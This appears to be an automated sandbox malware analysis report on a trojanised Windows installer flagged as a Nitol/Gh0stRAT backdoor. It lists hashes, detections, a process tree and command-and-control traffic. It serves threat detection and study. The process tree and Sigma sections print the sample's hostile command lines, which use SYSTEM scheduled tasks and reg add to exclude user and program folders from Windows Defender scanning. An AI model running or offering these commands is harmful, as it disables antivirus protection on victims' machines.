Edit tour

Windows Analysis Report
T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Overview

General Information

Sample name:	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe renamed because original name is a hash value
Original sample name:	T11.0.2.exe
Analysis ID:	1580438
MD5:	1268f9114ca93e5356a1c1ed706336c6
SHA1:	42daffd4e0dc4ea28dca0aab116daa76c601c78b
SHA256:	24f9d0446b2928fb060948bd1f9ec66ca963cf63ceea5f6817370c920158f610
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

T1#U5b89#U88c5#U52a9#U624b1.0.2.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe" MD5: 1268F9114CA93E5356A1C1ED706336C6)

WchJz1.exe (PID: 7128 cmdline: C:\Users\user\Documents\WchJz1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

WchJz1.exe (PID: 6808 cmdline: C:\Users\user\Documents\WchJz1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 6976 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2720 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3192 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1060 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4904 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5252 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1984 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4108 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5348 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3120 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4348 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5996 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 340 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1852 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5004 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5840 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

mm3ujg.exe (PID: 2688 cmdline: "C:\Program Files (x86)\mm3ujg\mm3ujg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 4136 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4312 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6032 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2316 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 1860 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2996 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7004 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 4116 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2764 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

mm3ujg.exe (PID: 6692 cmdline: "C:\Program Files (x86)\mm3ujg\mm3ujg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

nbq99ChWh.exe (PID: 1664 cmdline: "C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

mm3ujg.exe (PID: 2800 cmdline: "C:\Program Files (x86)\mm3ujg\mm3ujg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

nbq99ChWh.exe (PID: 2140 cmdline: "C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

mm3ujg.exe (PID: 5624 cmdline: "C:\Program Files (x86)\mm3ujg\mm3ujg.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

nbq99ChWh.exe (PID: 1908 cmdline: "C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: mm3ujg.exe PID: 2688	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: mm3ujg.exe PID: 2688	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0xad0:$Dwork: d:\work 0xd160:$Dwork: d:\work 0xa9208:$Dwork: d:\work 0x8f97b:$Shell6: Shell6 0x9075a:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.mm3ujg.exe.34d03e8.5.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.mm3ujg.exe.34d03e8.5.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.mm3ujg.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
4.2.WchJz1.exe.27e0000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
39.2.mm3ujg.exe.2d20000.4.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\WchJz1.exe, ParentImage: C:\Users\user\Documents\WchJz1.exe, ParentProcessId: 6808, ParentProcessName: WchJz1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 6976, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4312, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 6032, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6032, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T15:13:49.021028+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.4	49857	8.212.102.187	9000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\mm3ujg\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for submitted file

Source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\mm3ujg\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe

Unpacked PE file: 39.2.mm3ujg.exe.4430000.6.unpack

Source: unknown	HTTPS traffic detected: 39.103.20.20:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49743 version: TLS 1.2

Source:	Binary string: d:\workspace\WinToUSB\Output\x64\Release\setup.pdb source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: WchJz1.exe, 00000005.00000003.2435951929.0000000003B19000.00000004.00000020.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000000.2723250895.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 00000027.00000002.2946744392.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2946530757.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 00000028.00000000.2745785771.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 00000028.00000002.2753509560.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, nbq99ChWh.exe, 00000029.00000000.2749490125.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, nbq99ChWh.exe, 00000029.00000002.2757489075.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, mm3ujg.exe, 0000002C.00000002.2773739470.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 0000002C.00000000.2759438958.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, nbq99ChWh.exe, 0000002D.00000000.2760653139.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, nbq99ChWh.exe, 0000002D.00000002.2773789468.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, mm3ujg.exe, 0000002E.00000002.2925768634.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, mm3ujg.exe, 0000002E.00000000.2905763332.0000000000048000.00000002.00000001.01000000.0000000A.sdmp, nbq99ChWh.exe, 0000002F.00000000.2909687024.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, nbq99ChWh.exe, 0000002F.00000002.2926718159.00000000008E8000.00000002.00000001.01000000.0000000C.sdmp, mm3ujg.exe.5.dr, nbq99ChWh.exe.39.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe, 00000004.00000000.2130209027.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WchJz1.exe, 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WchJz1.exe, 00000005.00000000.2147977261.0000000140014000.00000002.00000001.01000000.00000008.sdmp, WchJz1.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_00007FFE11BDA1B8 FindFirstFileExW,

4_2_00007FFE11BDA1B8

Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DFFE
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDFF
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	4_2_0000000140011270
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DE96
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DEFB
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000E178
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:49857 -> 8.212.102.187:9000

Source: global traffic

TCP traffic: 192.168.2.4:49857 -> 8.212.102.187:9000

Source: Joe Sandbox View

